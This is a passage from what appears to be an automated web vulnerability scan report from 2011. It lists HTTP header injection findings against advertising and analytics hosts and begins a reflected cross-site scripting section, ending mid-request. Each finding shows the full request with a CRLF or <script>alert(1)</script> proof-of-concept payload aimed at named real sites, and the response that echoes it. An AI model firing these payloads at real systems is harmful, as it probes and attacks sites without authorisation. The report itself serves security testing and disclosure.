0d4ef121642/Rockyou.com/RockYou_Leaderboard_RON;sz=728x90;ord=1161383150732886:
Date: Mon, 18 Apr 2011 21:54:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3.2. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/Rockyou.com/RockYou_Sky_RON

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1d82d%0d%0a81cf5e4bc13 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1d82d%0d%0a81cf5e4bc13/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=1161383150732886? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1d82d
81cf5e4bc13/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=1161383150732886:
Date: Mon, 18 Apr 2011 21:55:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3.3. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f081%0d%0ac8413d74739 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f081%0d%0ac8413d74739;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikeall%2F1%2FH.22.1%2Fs25785419596359%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26D6445C05013CEB-4000011060047DF3%26%26ndh%3D1%26t%3D18%252F3%252F2011%252013%253A54%253A25%25201%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLGW%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnike%252Flanguage_select%252F%26cc%3DUSD%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dnike.com%26server%3Dnikeuslanding%26v5%3DD%253DUser-Agent%26c17%3Dlanguage_selector%26c18%3Dlanguage_selector%26c21%3Dlanguage_selector%26c22%3Dnon-id%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1333%26bh%3D1003%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=682341290 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f081
c8413d74739;src=1517119;host=nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359:
Date: Mon, 18 Apr 2011 18:55:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3.4. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 918d0%0d%0aeee4041afc5 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikeall%2F1%2FH.22.1%2Fs25785419596359%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26D6445C05013CEB-4000011060047DF3%26%26ndh%3D1%26t%3D18%252F3%252F2011%252013%253A54%253A25%25201%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLGW%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnike%252Flanguage_select%252F%26cc%3DUSD%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dnike.com%26server%3Dnikeuslanding%26v5%3DD%253DUser-Agent%26c17%3Dlanguage_selector%26c18%3Dlanguage_selector%26c21%3Dlanguage_selector%26c22%3Dnon-id%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1333%26bh%3D1003%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1918d0%0d%0aeee4041afc5&A2S=1;ord=682341290 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&vvpr=true&&pccr=true&vidn=26D6445C05013CEB-4000011060047DF3&&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1918d0
eee4041afc5&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1303152847:
Date: Mon, 18 Apr 2011 18:54:07 GMT
Server: GFE/2.0
Content-Type: text/html

3.5. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b064f%0d%0ac62025c962b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b064f%0d%0ac62025c962b/js/16228-124632-26209-0?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134592740-yo; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/b064f
c62025c962b/js/16228-124632-26209-0?mpt=33312011918&mpvc=&no_cj_c=1&upsid=067757709239
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/b064f
c62025c962b
...[SNIP]...
3.6. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cf199%0d%0a4d8654acbda was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/cf199%0d%0a4d8654acbda/16228-124632-26209-0?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-37088-1303134592866-4a; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/cf199
4d8654acbda/16228-124632-26209-0?mpt=33312011918&mpvc=&no_cj_c=1&upsid=896130692879
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/cf199
4d8654ac
...[SNIP]...
3.7. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 86555%0d%0a225983431ef was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/86555%0d%0a225983431ef?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-5289-1303134592990-y7; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/js/86555
225983431ef?mpt=33312011918&mpvc=&no_cj_c=1&upsid=774198745752
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/86555
22598
...[SNIP]...
3.8. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 43e84%0d%0a25027eec15f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /43e84%0d%0a25027eec15f/js/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/43e84
25027eec15f/js/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/43e84
25027eec15f
...[SNIP]...
3.9. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7001a%0d%0af5c43e94391 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/7001a%0d%0af5c43e94391/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/7001a
f5c43e94391/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/7001a
f5c43e94
...[SNIP]...
3.10. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload eef45%0d%0a3926a01f3a7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/eef45%0d%0a3926a01f3a7?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:53 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:53 GMT
Location: http://altfarm.mediaplex.com/ad/js/eef45
3926a01f3a7?mpt=33312011918&mpvc=&no_cj_c=0&upsid=822523287793
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/eef45
3926a
...[SNIP]...
3.11. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-1

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload fd87f%0d%0ab3f991af6c was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /ad/js/16228-124632-26209-1?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fd87f%0d%0ab3f991af6c

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=fd87f
b3f991af6c; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/js/16228-124632-26209-1?mpt=33312011918&mpvc=&no_cj_c=0&upsid=601200273551
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/js/16228-124632
...[SNIP]...
3.12. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nike.112.2o7.net
Path:   /b/ss/nikeall/1/H.22.1/s25785419596359

Issue detail

The value of the vmf request parameter is copied into the Location response header. The payload a1282%0d%0ab2fa319b9d3 was submitted in the vmf parameter. This caused a response containing an injected HTTP header.

Request

GET /b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=a1282%0d%0ab2fa319b9d3&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: nike.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 18:59:15 GMT
Server: Omniture DC/2.0.0
Location: http://a1282
b2fa319b9d3/b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&vmh=nike.112.2o7.net&&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=a1282%0d%0ab2fa319b9d3&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
Expires: Sun, 17 Apr 2011 18:59:15 GMT
Last-Modified: Tue, 19 Apr 2011 18:59:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
xserver: www6
Content-Length: 0
Content-Type: text/plain

4. Cross-site scripting (reflected)  previous
There are 203 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b6657<script>alert(1)</script>1d078170340 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b6657<script>alert(1)</script>1d078170340 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E70429D6F6493FB663F1D006E3F690ED; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=ea003982-934b-4901-a1cd-965372735402; Domain=adxpose.com; Expires=Sat, 06-May-2079 04:17:55 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 18 Apr 2011 01:03:47 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b6657<script>alert(1)</script>1d078170340".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b6657<script>
...[SNIP]...
4.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://btilelog.access.mapquest.com
Path:   /tilelog/transaction

Issue detail

The value of the transaction request parameter is copied into the HTML document as plain text between tags. The payload d3225<script>alert(1)</script>5267428e12c was submitted in the transaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tilelog/transaction?transaction=scriptd3225<script>alert(1)</script>5267428e12c&key=mjtd%7Clu6t2l68nh%2C7x%3Do5-larxu&itk=true&v=5.3.s&ipkg=controls1 HTTP/1.1
Accept: */*
Accept-Language: en-US
